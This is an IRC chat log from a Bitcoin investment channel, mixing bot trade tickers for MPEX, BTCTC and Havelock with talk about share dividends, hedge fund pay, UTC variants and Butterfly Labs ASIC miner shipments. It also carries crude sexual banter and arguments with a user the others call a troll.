45.9326 seconds Mar 29 04:39:02 smickles really? Mar 29 04:39:20 Chaang-Noi: yeah, gox traders didn't even react for 5 min or so Mar 29 04:39:31 copumpkin: do the iphone guys use freenode? Mar 29 04:39:34 last night i bet it was thicker than what it is now, that is a massive sell off Mar 29 04:39:35 well Mar 29 04:39:40 MJR_III: not really Mar 29 04:39:41 I wish BTC would get to $1000 already Mar 29 04:39:48 Diablo-D3: over 8000!!! Mar 29 04:39:55 Diablo-D3: yep...i can't wait Mar 29 04:40:02 no, $1000 is fine Mar 29 04:40:09 I just need enough money to start DMC Mar 29 04:40:11 you sure you wouldn't prefer over 8000!?!?!?!? Mar 29 04:40:39 copumpkin: it'd take too long Mar 29 04:40:46 the laptop i bought with btc at the begining of this week is named "btc9001" Mar 29 04:40:47 i mostly think that it is necessary for the price to get to that level so we can start doing real institutional stuff Mar 29 04:40:49 and its clear copumpkin is a fan of the source material Mar 29 04:40:53 lol Mar 29 04:41:21 gonna be a huge space available for investment bank/underwriting, handling IPO's etc Mar 29 04:41:28 someone just did a lot on btcn Mar 29 04:41:49 MJR_III: yeah, but Im looking for over $200m. Mar 29 04:46:14 tiberiusiv: what do you do when you're not arguing on IRC? Mar 29 04:47:01 sounds like fun Mar 29 04:51:09 [HAVELOCK] [HIM] 1 @ 1.92 BTC [+] Mar 29 04:52:55 [BTCTC] [S.DICE-PT] 3 @ 0.00485 = 0.0146 BTC [-] Mar 29 04:52:59 [BTCTC] [BASIC-MINING] 2 @ 0.3519 = 0.7038 BTC [-] Mar 29 04:53:00 [BTCTC] [S.DICE-PT] 1 @ 0.005 BTC [+] Mar 29 04:53:06 [BTCTC] [S.DICE-PT] 49 @ 0.00506 = 0.2479 BTC [+] Mar 29 04:53:16 lol copumpkin Mar 29 04:53:17 [BTCTC] [S.DICE-PT] 78 @ 0.005065 = 0.3951 BTC [+] Mar 29 04:53:22 [BTCTC] [S.DICE-PT] 79 @ 0.005075 = 0.4009 BTC [+] Mar 29 04:53:27 [BTCTC] [S.DICE-PT] 475 @ 0.00508 = 2.413 BTC [+] Mar 29 04:53:51 smickles: it's kind of hard to do some financial analysis of sdice right now right? we don't have a full year of data... Mar 29 04:53:52 [BTCTC] [ASICMINER-PT] 4 @ 0.849998 = 3.4 BTC [+] Mar 29 04:54:34 would like to come up with a realistic valuation Mar 29 04:54:49 did you guys know that there's a million-dollar-an-hour club? Mar 29 04:55:00 lol what..nice. Mar 29 04:55:00 (of high earners, to put it lightly) Mar 29 04:55:06 copumpkin: where? Mar 29 04:56:36 http://www.amazon.com/How-Make-Million-Dollars-Hour/dp/1118239245 Mar 29 04:56:37 MJR_III: i'm sure you could get a good idea from the data out there now. the main thing would be wether or not there will come some outside influence on their operations Mar 29 04:56:40 lol @ inflammatory title Mar 29 04:56:55 but there are HF managers who have made that much on good years, if you assume 40-hour work weeks and the like Mar 29 04:57:43 record for HF is 4 billion one year Mar 29 04:57:47 ;;bc,24hprc Mar 29 04:57:48 87.54 Mar 29 04:57:58 for the hedge fund manager Mar 29 04:58:00 MJR_III: I think paulson made 4.8 one year Mar 29 04:58:03 dalio has made 3.8 Mar 29 04:58:08 wow Mar 29 04:58:15 a few others Mar 29 04:58:25 but it is a common saying among those guys that they wouldn't roll out of bed for what lloyd blankfein makes Mar 29 04:58:53 but the average hedge fund manager makes ONLY 375k Mar 29 04:58:54 hah Mar 29 04:59:08 [HAVELOCK] [VTX] 4 @ 0.47 = 1.88 BTC [+] Mar 29 04:59:09 [HAVELOCK] [VTX] 4 @ 0.47 = 1.88 BTC [+] Mar 29 04:59:19 i was reading an article about hedge fund guys, and that was the cautionary tale Mar 29 04:59:37 i know you guys think you will get rich but be aware most people only make slightly under 400k a year Mar 29 04:59:54 lol Mar 29 04:59:57 i'm like...oh in that case nevermind Mar 29 05:00:01 i wonder if it's worth reading thr scrollback Mar 29 05:00:04 lol Mar 29 05:00:06 mircea_popescu: absolutely not Mar 29 05:00:08 [HAVELOCK] [VTX] 2 @ 0.478 = 0.956 BTC [+] Mar 29 05:00:10 mircea_popescu: no it isn't Mar 29 05:00:26 227 ignored lines it says. yeah, i see. Mar 29 05:00:42 it was entertaining for a little while, but i am hoping that we can move past the tiberiusiv era Mar 29 05:00:52 [BTCTC] [ASICMINER-PT] 1 @ 0.849998 BTC [+] Mar 29 05:01:04 i wonder who the next ciuciu will be Mar 29 05:01:08 [HAVELOCK] [VTX] 2 @ 0.479 = 0.958 BTC [+] Mar 29 05:01:12 his latest argument was that it is too expensive to short bitcoins because if they go up your interest rate is huge Mar 29 05:01:16 MJR_III: and most people at HFs aren't the "managers" as people call them Mar 29 05:01:21 [BTCTC] [ASICMINER-PT] 5 @ 0.849998 = 4.25 BTC [+] Mar 29 05:01:28 copumpkin: my friend is a quant for one Mar 29 05:01:34 most of the hedge funds are quite small Mar 29 05:01:39 MJR_III he had me yesterday, when he was explaining that he can't short mpoe because he doesn;t own all the money in the world Mar 29 05:01:45 yup Mar 29 05:01:47 couple qualitatives, couple quants...and a manager Mar 29 05:01:50 mircea_popescu: he tried that on us too Mar 29 05:01:51 but failed to understand how this undermines his argument as to mpoe being weak. Mar 29 05:01:54 yep Mar 29 05:02:04 it was ridiculous Mar 29 05:02:09 sorta like... you need all the money in the world to push over this here rotten reed. Mar 29 05:02:12 seems legit Mar 29 05:02:17 i told him i couldn't borrow a quintillion dollars either Mar 29 05:02:28 a cunnilingus dollars ?! Mar 29 05:02:33 lol Mar 29 05:02:49 and that P != P + I Mar 29 05:03:03 any new money created through debt does not create enough for the interest on the debt Mar 29 05:03:18 well anyway. Mar 29 05:03:18 and yet the world keeps on turning Mar 29 05:03:46 bitcoin failed to cross 100, mpoe contracrt volume failed to cross 1/2 mn Mar 29 05:03:54 i can't claim 50mn notional this month ;/ Mar 29 05:03:56 oh no! Mar 29 05:03:56 all is for naught Mar 29 05:04:08 all is for naughty Mar 29 05:04:11 haha Mar 29 05:04:16 THE JIG IS UP! Mar 29 05:04:37 smickles da jiggle Mar 29 05:04:55 what was the total volume mircea_popescu Mar 29 05:05:05 like almost 500k Mar 29 05:05:14 quite impressive Mar 29 05:05:18 it is Mar 29 05:05:24 last highest was like 130k iirc Mar 29 05:05:35 expecting good dividends? Mar 29 05:05:53 that we see tomorro Mar 29 05:05:59 hmmm Mar 29 05:06:06 brb Mar 29 05:06:13 MJR_III: he typically keeps a tight lip on that topic Mar 29 05:06:42 yeh teh tradition is that no comment Mar 29 05:07:04 [MPEX] [S.MPOE] 4600 @ 0.00066065 = 3.039 BTC [-] Mar 29 05:07:15 hehehe Mar 29 05:07:17 all good Mar 29 05:07:18 Bugpowder, iirc, seems to think no dividend, mpbor boned Mar 29 05:07:31 almost tripled my position Mar 29 05:07:46 $unconfirmed Mar 29 05:07:50 smickles: 1338 Mar 29 05:07:56 190`817 actually Mar 29 05:08:00 back in january Mar 29 05:08:05 odd how mpex volume seems to skip a month Mar 29 05:08:08 hmmm Mar 29 05:08:10 mpoe i mean Mar 29 05:08:15 why did my trade not hit assbot? Mar 29 05:08:18 I wonder how much is in my mpex account right now Mar 29 05:08:24 lol, there it is Mar 29 05:08:40 !mp copumpkin's account details Mar 29 05:08:41 Please use http://dpaste.com/ Mar 29 05:08:47 lol Mar 29 05:08:55 I see... Mar 29 05:08:59 that's a funny thing Mar 29 05:09:02 wait, mpoe back to 66 ? Mar 29 05:09:23 mircea_popescu: what'd it start at again? Mar 29 05:09:35 0.00002 Mar 29 05:09:50 hmm Mar 29 05:10:13 copumpkin: i have a gui interface to mpex now :) Mar 29 05:10:14 so I've made decent money off of my investment Mar 29 05:10:16 well actually 0.00009 1st block (1mn) then 2nd block 0.000025 or so Mar 29 05:10:17 assuming I sell it Mar 29 05:10:21 [23:06] yeh teh tradition is that no comment Mar 29 05:10:21 and I'm improving it too Mar 29 05:10:28 ^^^^ ofc Mar 29 05:10:47 Otherwise it would impact derivates trading if people could know upfront Mar 29 05:10:58 hmmm Mar 29 05:11:02 good point Mar 29 05:12:04 copumpkin wait you had shares too ? Mar 29 05:12:08 lol Mar 29 05:12:18 yeah, around 110k iirc Mar 29 05:12:19 http://youtu.be/jyLvkF2z0AQ Mar 29 05:12:34 this is so disconnecty for me. on one hand there's this endless stream of "o, mpoe, scam, nobody uses it, wtfbbq" Mar 29 05:12:41 on the other everyone seems to have shares, i'm like... Mar 29 05:12:44 loooost Mar 29 05:12:44 I never said that! Mar 29 05:12:48 not u! Mar 29 05:12:50 forumppl Mar 29 05:12:51 copumpkin: that link was for you Mar 29 05:13:12 smickles: I see :P Mar 29 05:13:20 oh he's back! Mar 29 05:13:20 hehehe Mar 29 05:13:56 tiberiusiv: still made good money off of it Mar 29 05:13:58 if I did sell Mar 29 05:13:58 forum people are angry of having to either pay fees to a broker or pay a high fee to trade directly on the exchange. Mar 29 05:13:59 which I won't Mar 29 05:14:06 cause I'm too lazy to place an order through the system :P Mar 29 05:14:16 Or just angry at your personality/the other business you run Mar 29 05:14:27 Namworld in a word, just angry. Mar 29 05:14:27 copumpkin: smickles.com/mpex-gui/ Mar 29 05:14:28 or even MPOE-PR being a loudmouth Mar 29 05:14:32 aye Mar 29 05:14:41 tiberiusiv, true Mar 29 05:14:46 smickles: cute! still too lazy though :( Mar 29 05:14:49 Fees are good on coinbr Mar 29 05:14:51 haha! Mar 29 05:14:51 tiberiusiv: seriously? Mar 29 05:15:16 Ah yes, many just don't like mircea. Mar 29 05:15:21 what other business do you run mircea_popescu Mar 29 05:15:31 i dunno what he meant Mar 29 05:15:34 people dislike mircea_popescu because his penis is too big Mar 29 05:15:38 lol Mar 29 05:15:51 who gives a fuck how they feel...the exchange speaks for itself Mar 29 05:15:54 that's my clitoris. Mar 29 05:15:57 my penis' even bigger. Mar 29 05:16:04 tiberiusiv: did you go by another nick in the past? Mar 29 05:16:12 there was another guy in here Mar 29 05:16:18 who spoke about mircea_popescu in exactly the same terms Mar 29 05:16:24 I can't remember what his nick was Mar 29 05:16:51 don rickles ? Mar 29 05:17:08 tiberiusiv: "gypsy scum" is the truth? Mar 29 05:17:45 i thought he just whipped the women Mar 29 05:17:56 tiberiusiv: so are the admins of reddit also gypsy scum? Mar 29 05:17:59 and moot, perhaps Mar 29 05:18:00 yeah, the whole bdsm article confused me a little Mar 29 05:18:16 lol Mar 29 05:18:24 it must be great seeing everything in perfect black and white Mar 29 05:18:33 really makes life a lot simpler Mar 29 05:18:37 to see no nuance at all :) Mar 29 05:18:42 'internet people' and 'real capital' Mar 29 05:18:46 smickles i don't think he knows about that part yet. Mar 29 05:18:46 i think "simple" sums him up perfectly Mar 29 05:18:57 tiberiusiv: and we don't? Mar 29 05:19:03 admittedly, I kinda don't Mar 29 05:19:09 [HAVELOCK] [SDICE] 1 @ 0.40999998 BTC [+] Mar 29 05:19:09 [HAVELOCK] [SDICE] 1 @ 0.40999998 BTC [+] Mar 29 05:19:10 [HAVELOCK] [SDICE] 2 @ 0.40999999 = 0.82 BTC [+] Mar 29 05:19:12 [HAVELOCK] [SDICE] 1 @ 0.41099999 BTC [+] Mar 29 05:19:13 [HAVELOCK] [SDICE] 5 @ 0.41099999 = 2.055 BTC [+] Mar 29 05:19:30 was that a buy or a sell? Mar 29 05:19:46 fine Mar 29 05:19:46 the + means they took the ask right? Mar 29 05:19:53 [BTCTC] [S.DICE-PT] 77 @ 0.00508 = 0.3912 BTC [+] Mar 29 05:19:58 tiberiusiv: why are you actively set against him, instead of just neutral, then? Mar 29 05:19:58 [BTCTC] [S.DICE-PT] 98 @ 0.0055 = 0.539 BTC [+] Mar 29 05:20:04 okay, so they won't invest in him Mar 29 05:20:08 who cares? Mar 29 05:20:13 trolls care Mar 29 05:20:36 tiberiusiv is like atheists who devote all of their time to arguing about things they don't believe in Mar 29 05:20:58 tiberiusiv: how do you know he's a fraudster? Mar 29 05:21:01 MJR_III: the + means it was traded higher than the last time, not a statement on who was the liquidity taker Mar 29 05:21:10 agnostics just go on about their business...to be honest most religious people spend less time talking about religion than most atheists on reddit at least Mar 29 05:21:28 huh Mar 29 05:21:38 tiberiusiv: he publishes reports monthly, doesn't he? Mar 29 05:21:43 or you mean looking behind that? Mar 29 05:21:52 have you verified mtgox's reports? Mar 29 05:22:08 [HAVELOCK] [HIM] 1 @ 1.92 BTC [+] Mar 29 05:22:14 so is MagicalTux a fraudster? Mar 29 05:22:30 copumpkin: no he is probably just poor/a kid Mar 29 05:22:42 copumpkin: well, he would've been, (MT) but he started making too much money Mar 29 05:22:52 tiberiusiv: but how about MagicalTux? Mar 29 05:23:05 the owner of mtgox Mar 29 05:23:08 [HAVELOCK] [SDICE] 2 @ 0.445 = 0.89 BTC [+] Mar 29 05:23:31 isn't that true of every merchant out there? Mar 29 05:23:56 and polimedia isn't Mar 29 05:23:57 you mean like advertising? Mar 29 05:24:00 @.@ Mar 29 05:24:08 [HAVELOCK] [VTX] 2 @ 0.479 = 0.958 BTC [+] Mar 29 05:24:58 he's in romania because he's romanian, I thought Mar 29 05:25:05 although he did move there after being in the US Mar 29 05:25:18 most people live in the place they're from, eventually Mar 29 05:25:26 what scheme was that? Mar 29 05:25:42 have you been there? Mar 29 05:25:46 copumpkin: consulting, iirc Mar 29 05:26:04 http://www.youtube.com/watch?v=X1y0vfBGm38 Mar 29 05:26:12 pretty lolzy. wtf are they doing with the chips Mar 29 05:26:15 tiberiusiv: have you been there? Mar 29 05:27:16 you know a lot Mar 29 05:27:37 yessir! Mar 29 05:28:13 copumpkin: he will circle back to his first point again at some point and just repeat the cycle Mar 29 05:29:07 $ grep "" foo.txt | grep "?" | wc -l Mar 29 05:29:08 15 Mar 29 05:29:13 $ grep "" foo.txt | wc -l Mar 29 05:29:13 253 Mar 29 05:29:34 just a statistic Mar 29 05:29:41 my log of this channel from the past couple of hours Mar 29 05:29:56 just the past couple of hours? Mar 29 05:30:01 yeah Mar 29 05:30:30 negraneu reminds me of edward norton so i always think of rounders when i see him play Mar 29 05:31:16 he kinda sucks imo Mar 29 05:31:21 telegraphs to all hell Mar 29 05:31:56 we must have different greps, that same command gets me 2 and 12 Mar 29 05:32:16 and my logs go back a while Mar 29 05:32:29 different greps have different syntax Mar 29 05:33:12 i don't see what i'm doing wrong with mine D: Mar 29 05:33:30 you ignoring him perchance? :P Mar 29 05:33:51 nope Mar 29 05:33:56 i don't ignore anyone Mar 29 05:33:57 different greps what abominations am i reading Mar 29 05:34:03 there's only one grep and its name is grep Mar 29 05:34:06 lol Mar 29 05:34:27 there are different greps, actually :P Mar 29 05:34:33 infidel Mar 29 05:34:48 there is but one true grep Mar 29 05:34:52 http://www.foxnews.com/leisure/2013/03/28/company-releases-new-bacon-flavored-condoms/#ixzz2OriHQTSs Mar 29 05:35:04 fox. farly balanced. Mar 29 05:35:17 OOOOOHHHHH Mar 29 05:35:20 lol Mar 29 05:35:20 they put tastebuds in rectums (recta?) now? Mar 29 05:35:29 my log does it like < tiberiusiv> Mar 29 05:36:11 copumpkin: i have 1998 vs 20974 Mar 29 05:36:28 smickles: perhaps he's usually more inquisitive than he was tonight Mar 29 05:36:43 it'd be interesting to run a sliding window average over it Mar 29 05:36:44 how is that sell off last night going to lower the 24 hour average for all these calls? Mar 29 05:36:46 and plot the topic of conversation Mar 29 05:36:59 ;;bc,24hprc Mar 29 05:37:00 87.54 Mar 29 05:37:01 Chaang-Noi: ^ Mar 29 05:37:11 copumpkin tastebutts. Mar 29 05:37:17 hmm higher than i expected Mar 29 05:37:18 mircea_popescu: ohhh! Mar 29 05:37:24 mircea_popescu: never knew they were spelled that way Mar 29 05:37:26 that sell off might not have had volume Mar 29 05:37:32 everything makes sense now Mar 29 05:37:40 but srsly, i'm looking forward to fresh onion flavoured Mar 29 05:37:46 lol Mar 29 05:37:54 same tearflow, less wear and tear on the whips Mar 29 05:37:59 bhut jolokia flavor Mar 29 05:38:14 you like onions when you go down on a guy? lol are we still talking about flavoured comdoms? Mar 29 05:38:49 sour apple should improve performance Mar 29 05:39:31 i never understood why one would even wont to have a condom on while getting a bj Mar 29 05:39:46 condoms are good for aids/babies Mar 29 05:39:48 Chaang-Noi some people don't have ALL the venereal disease there is yet. Mar 29 05:40:01 why not find a clean girl? Mar 29 05:40:23 is it really bad in romania? Mar 29 05:40:30 not rly. Mar 29 05:40:56 maybe iv just been lucky :/ Mar 29 05:41:27 i saw some that had some kind of coating, the box said 'for external use only'. wtf is that? Mar 29 05:41:40 handjobs? Mar 29 05:41:55 or maybe a tit fuck? Mar 29 05:42:10 some people hammer nails with their cocks Mar 29 05:42:24 some people put nails through their cocks Mar 29 05:42:34 tiberiusiv: now you're just trolling; go away Mar 29 05:42:54 copumpkin just now? lol this troll has been around a while:) Mar 29 05:43:10 tiberiusiv: please tell me what you have deduced about me Mar 29 05:43:11 oh tiberslav Mar 29 05:43:24 although i've never been to romainia, tiberiusiv, you're starting to come off more like a bigot as time goes on Mar 29 05:43:57 smickles the only thin tiberslav said was good about mp was when he burnt the koran Mar 29 05:43:59 mircea_popescu: you mised the part when tiberiusiv called copumpkin poor for disagreeing with him Mar 29 05:44:24 poor, poor, poor copumpkin Mar 29 05:44:30 I think we all need report cards, written up by tiberiusiv Mar 29 05:44:34 tiberiusiv: actually, i've been to the lower 48, most of norther mexico and most of souther canada Mar 29 05:44:46 enumerating the things he's deduced about us based on our extensive interactions Mar 29 05:44:47 when finance reared its ugly head copumpkin poorly wrote a check and fled... Mar 29 05:44:52 lol Mar 29 05:45:03 i had to backtrack and go to rhode island, so fucking small i missed it the first time around Mar 29 05:45:16 tiberiusiv: inorite Mar 29 05:45:24 I don't think I actually offered Mar 29 05:45:32 but I did propose you asking as a solution to your problem Mar 29 05:45:33 tiberiusiv: nope Mar 29 05:45:42 tiberiusiv: how many are you actually looking for, out of curiosity? Mar 29 05:45:44 anyway. nobody who owns mpoe stock is poor. Mar 29 05:46:01 tiberiusiv: I am rich, filled to the brim with mircea_popescu's love Mar 29 05:46:02 I almost went to japan once, but decided to go to gencon instead Mar 29 05:46:32 ya you are full of it copumpkin Mar 29 05:46:37 mmmm Mar 29 05:46:40 tiberiusiv: that is about the extent of my travels, although i'd consider american and canadan indians a seperate culture Mar 29 05:46:49 "She didn't have large breasts, but they were by no means small either." Mar 29 05:46:55 sometimes i wonder if these people ever saw tits Mar 29 05:46:56 lol Mar 29 05:47:01 no, bigots are bigots Mar 29 05:47:02 pretty much the only characterisation ever made is "big" Mar 29 05:47:07 "not big but still big" Mar 29 05:47:08 a canadan tribe almost imprisoned me for going up the wrong creek once Mar 29 05:47:09 "even bigger" Mar 29 05:47:14 tiberiusiv: anyway, I'm curious what you think about me Mar 29 05:47:18 dude there's more to boob than mass. Mar 29 05:47:22 tiberiusiv: can you give me any more information? Mar 29 05:47:36 [23:44:47] copumpkin offered to lend his vast holdings of BTC for short selling Mar 29 05:47:48 [23:42:54] wouldnt expect any less of a response from an mpex shareholder Mar 29 05:47:50 I don't know Mar 29 05:47:52 but you clearly do Mar 29 05:47:56 based on those comments and others Mar 29 05:48:05 tiberiusiv: that's not really my criteria for bigotry, and i don't really favor american political correctness, so far as i can tell Mar 29 05:48:12 no Mar 29 05:48:16 I've gotten into big fights with him before Mar 29 05:48:23 and I think he's kinda an asshole Mar 29 05:48:34 but I don't think he's dishonest and he's smart Mar 29 05:48:51 ;;asks 95 Mar 29 05:48:54 sounds like a fun place Mar 29 05:48:54 There are currently 9528.5939 bitcoins offered at or under 95.0 USD, worth 896329.793098 USD in total. | Data vintage: 0.0020 seconds Mar 29 05:49:04 ;;asks 100 Mar 29 05:49:04 There are currently 26042.659 bitcoins offered at or under 100.0 USD, worth 2515384.40478 USD in total. | Data vintage: 10.7147 seconds Mar 29 05:49:07 he thinks I'm too nice, too Mar 29 05:49:08 [HAVELOCK] [VTX] 4 @ 0.475 = 1.9 BTC [-] Mar 29 05:49:10 [HAVELOCK] [VTX] 3 @ 0.479 = 1.437 BTC [+] Mar 29 05:49:11 mircea_popescu: right? Mar 29 05:49:12 that grew a lot Mar 29 05:49:33 and cute to ;) Mar 29 05:49:40 oh, smickles dug up a photo of me Mar 29 05:49:53 copumpkin: that one on rg's site? Mar 29 05:49:59 oh forgot about that Mar 29 05:50:04 I guess you aren't as much of a creep as you sounded Mar 29 05:50:14 ha! Mar 29 05:50:15 apparently I look like a "faggot" in that picture Mar 29 05:50:21 according to mad7scientist Mar 29 05:50:25 orly? Mar 29 05:50:28 yeah Mar 29 05:50:55 ya know, mad7 was my first, .. so far as btc trades go Mar 29 05:51:25 i wonder what mad7scientist's opinion of my photo on there is Mar 29 05:52:12 aww, the photobook was taken down Mar 29 05:52:24 copumpkin: nOOOOooOOO! Mar 29 05:52:32 [MPEX] [S.DICE] 1500 @ 0.00419992 = 6.2999 BTC [+] Mar 29 05:52:34 [MPEX] [S.DICE] 5450 @ 0.00419993 = 22.8896 BTC [+] Mar 29 05:52:37 ;;seen jurov Mar 29 05:52:37 jurov was last seen in #bitcoin-assets 4 hours, 9 minutes, and 21 seconds ago: so armory seems to account for that? Mar 29 05:52:49 tiberiusiv: too many bots in this chan, right? Mar 29 05:52:54 looks like archive.org got all the good stuff, eh: http://web.archive.org/web/20120910023714/http://photobook.bitvps.com/index.php/ Mar 29 05:55:13 oh, that must be what sarcasm is Mar 29 05:55:26 took me a minute to realize it Mar 29 05:58:37 hmm... RG used to ahve a photobook aight... Mar 29 05:59:15 [BTCTC] [S.DICE-PT] 72 @ 0.0045 = 0.324 BTC [-] Mar 29 05:59:20 [BTCTC] [S.DICE-PT] 19 @ 0.0045 = 0.0855 BTC [-] Mar 29 05:59:22 [BTCTC] [S.DICE-PT] 32 @ 0.00442 = 0.1414 BTC [-] Mar 29 05:59:25 [BTCTC] [S.DICE-PT] 51 @ 0.00442 = 0.2254 BTC [-] Mar 29 05:59:27 [BTCTC] [S.DICE-PT] 1 @ 0.0044 BTC [-] Mar 29 06:01:47 you know...mt gox is kinda too big to fail Mar 29 06:01:55 did i miss anything other than rebounding to 90 and half of a bunch of shitty conversations with tiberius? Mar 29 06:02:09 ThickAsThieves: pretty much summed up tonight Mar 29 06:02:15 cool Mar 29 06:03:13 i couldn't see any of the pictures Mar 29 06:03:17 MJR_III: i don't think they're too ig to fail Mar 29 06:03:40 huh? Mar 29 06:03:47 mircea_popescu: well, your idea of a fight tends to be /ignore Mar 29 06:03:52 which I've been at least once Mar 29 06:03:53 :P Mar 29 06:04:04 or my perception of you being in a fight with me Mar 29 06:04:26 i only remember civil debates Mar 29 06:04:44 points raised, evidence presented Mar 29 06:04:48 but yeah, basically, you're too nice Mar 29 06:04:51 which is harmful to the environment Mar 29 06:04:52 such and soforth Mar 29 06:05:59 I ran numbers on my btc portfolio today, it's officially worth 1.5x my yearly salary at my day job. Mar 29 06:06:27 it's just play money tho Mar 29 06:06:37 you're lucky you have a dayjob Mar 29 06:06:38 just scams and games Mar 29 06:06:56 thickasthieves: thats tight Mar 29 06:07:00 why am i lucky? Mar 29 06:07:38 mircea_popescu: hah, my job tries hard to make me unnice! Mar 29 06:08:04 what was it, fluffer ? Mar 29 06:08:11 yup Mar 29 06:08:23 bitchiest gals in showbiz. Mar 29 06:08:48 that's gotta be a hard job tho Mar 29 06:08:54 not even at the hight of my btc balance did i have enough to hit my yearly salary @$90/btc Mar 29 06:09:15 you're lucky you have a dayjob <---this flew over my head Mar 29 06:09:20 but then again i had a small gpu farm..met the author of Bamt that was kind of cool Mar 29 06:09:21 i am looking into quitting my job now Mar 29 06:09:34 smickles: works for me Mar 29 06:09:35 ThickAsThieves just general kvetch. "in this economy, you're lucky to have a pickle" Mar 29 06:09:36 he lives near me Mar 29 06:09:41 ah Mar 29 06:09:43 when you'll be jewish you'll understand. Mar 29 06:09:47 hopefully find something in the bitcoin space Mar 29 06:10:13 have u guys ever heard of BAMT? Mar 29 06:10:15 i thought you were implying that 1.5x is not good enough, and to stick to it Mar 29 06:10:24 1.5x is not good enough Mar 29 06:10:32 but i wont be sticking to my day bjob Mar 29 06:11:03 already neglecting it... Mar 29 06:11:15 im not a great fan of dayjobs. Mar 29 06:12:05 i'm not going to stop until i have an estate, some serfs, and a scribe Mar 29 06:12:16 wouldn't it be easier to learn to spell ? Mar 29 06:12:20 Wouldn't you want minion? Mar 29 06:12:30 Or maybe even some sharks with freaking lasers? Mar 29 06:13:17 inb4 smickles' revised list : " an estate, some serfs, a scribe and an extensive collection of skulls taken from people who discussed my spelling" Mar 29 06:13:34 lol Mar 29 06:14:36 as a future member of the imprisoned aristocracy, i say good day sir Mar 29 06:15:03 smickles: lol Mar 29 06:15:11 when do the new options hit mpex? Mar 29 06:15:18 its the 29th here in nyc... Mar 29 06:15:32 midnight utc Mar 29 06:15:55 its 4:15 utc Mar 29 06:16:04 indeed Mar 29 06:16:07 so wouldn't that have been 4 hours ago? Mar 29 06:16:09 myess Mar 29 06:16:17 heh, no Mar 29 06:16:25 this coming midnight Mar 29 06:16:40 what's wrong with smickles's spelling? Mar 29 06:17:11 copumpkin: i do tend to spell somethings incorectly frome time to time. Mar 29 06:17:16 I see. Mar 29 06:17:19 [BTCTC] [RSM] 1 @ 0.00382 BTC [+] Mar 29 06:17:19 ah i thought it was midnight of the 29th Mar 29 06:17:40 not midnight of the 30th Mar 29 06:17:42 no big deal Mar 29 06:18:04 MJR_III: um, well, 23:59:59 on the 29th Mar 29 06:18:43 [BTCTC] [RSM] 1 @ 0.00382 BTC [+] Mar 29 06:18:46 [BTCTC] [RSM] 49 @ 0.00383 = 0.1877 BTC [+] Mar 29 06:18:52 that's when the Ts expire, the Ns switch over, and new Ns appear Mar 29 06:20:13 ah ok Mar 29 06:20:24 isn't it the same as GMT? Mar 29 06:20:39 practically, yes, technically no Mar 29 06:21:06 there are actually something like 3 UTCs Mar 29 06:23:24 oh rly Mar 29 06:23:37 has anyone seen or read cosmopolis? Mar 29 06:23:43 ut0, ut1, ut1r, ut2, ut2r, utc. utc is practically ut1, but the difference is called dut1 Mar 29 06:23:52 [MPEX] [S.MPOE] 22800 @ 0.00065791 = 15.0003 BTC [-] Mar 29 06:23:52 ah Mar 29 06:23:53 [MPEX] [S.MPOE] 1600 @ 0.00065362 = 1.0458 BTC [-] Mar 29 06:24:00 are these technical differences? Mar 29 06:24:06 hold on, i'm off to wikipedia Mar 29 06:26:51 MJR_III: "UT1R is a smoothed version of UT1, filtering out periodic variations due to tides. It includes 62 smoothing terms, with periods ranging from 5.6 days to 18.6 years." Mar 29 06:27:00 you can look forward to stuff like that Mar 29 06:35:08 [HAVELOCK] [HIM] 1 @ 1.9199 BTC [-] Mar 29 06:39:08 [HAVELOCK] [HIM] 1 @ 1.92 BTC [+] Mar 29 06:43:22 [MPEX] [S.MPOE] 10050 @ 0.00065985 = 6.6315 BTC [+] Mar 29 06:43:22 [MPEX] [S.MPOE] 1900 @ 0.00066065 = 1.2552 BTC [+] Mar 29 06:44:08 [HAVELOCK] [VTX] 2 @ 0.479 = 0.958 BTC [+] Mar 29 06:47:58 [MPEX] [S.MPOE] 5000 @ 0.00066265 = 3.3133 BTC [+] Mar 29 06:54:17 BFL is shipping Mar 29 06:54:24 it seems Mar 29 06:54:42 i cant pin down the source, but https://twitter.com/BFL_News Mar 29 06:54:55 and BFL shoutbox is talking with Josh about it now Mar 29 06:55:06 essentially the power isnt where theyd like Mar 29 06:55:11 but they are shipping anyway Mar 29 06:55:23 and tweaking next batch or sumth Mar 29 06:57:05 ThickAsThieves: u mean electricity consumption isn't what they'd like, or hashrate isn't what they'd like? Mar 29 06:57:11 elec Mar 29 06:57:28 they say the prob is not in the chip Mar 29 06:57:51 oh so maybe it's like a firmware update they're gonna have to send out or something Mar 29 06:58:19 or a new pcb Mar 29 06:58:26 or new power supply Mar 29 06:58:29 etc Mar 29 06:59:19 cant figure out when they are saying theyll ship these Mar 29 06:59:41 wow, sooooo fun reading the news in the form of reverse chronological tweets Mar 29 07:00:06 hehe Mar 29 07:02:32 good update tho thx ThickAsThieves Mar 29 07:03:53 [BTCTC] [ASICMINER-PT] 1 @ 0.84998 BTC [-] Mar 29 07:04:39 reaaally Mar 29 07:04:52 so hashing speed is on target Mar 29 07:04:54 [MPEX] [S.MPOE] 5000 @ 0.00067064 = 3.3532 BTC [+] Mar 29 07:04:56 [MPEX] [S.MPOE] 31200 @ 0.00067065 = 20.9243 BTC [+] Mar 29 07:04:56 power is dobule Mar 29 07:04:59 double* Mar 29 07:05:10 is it? Mar 29 07:05:15 i couldnt find the specs Mar 29 07:05:17 oh Mar 29 07:05:26 reading now Mar 29 07:06:17 "The power is still far less than any other unit, so it's not like it's something crazy or anything, but it's not 1w/GH " Mar 29 07:07:52 yea Mar 29 07:07:59 We will ship the purchased hashrate regardless of what it ends up costing us. Mar 29 07:08:15 ie. ship two singles that do 30gh each Mar 29 07:08:40 i guess they will have to underclock the chips or something so power isnt to much for the board to handle Mar 29 07:09:10 so avalon gets 60GHs on 600w Mar 29 07:09:14 i think im order number 2017.. Mar 29 07:09:29 bfl says worstcase is 195w Mar 29 07:09:33 63Ghs avalon* Mar 29 07:09:46 #2511 Mar 29 07:09:50 and BFL was claiming they were gonna get 60Ghs on 60w?! Mar 29 07:10:08 im cool with it, i just want my unit Mar 29 07:10:11 asap Mar 29 07:10:34 he claims they can do 400 units per day once they start Mar 29 07:10:39 not sure what a unit is Mar 29 07:10:48 i would assume Mar 29 07:10:53 singles Mar 29 07:11:10 how many singles in a minirig? Mar 29 07:11:10 so thats about 8000 per month Mar 29 07:11:13 woo Mar 29 07:11:19 im within the first 1000 Mar 29 07:11:30 im pretty sure orders started at 1600 Mar 29 07:11:49 Thick: BFL has a much smaller nm chips than Avalon/Asicminer I believe Mar 29 07:11:58 yea they do Mar 29 07:12:01 which comes with highly reduced power usage per hashing Mar 29 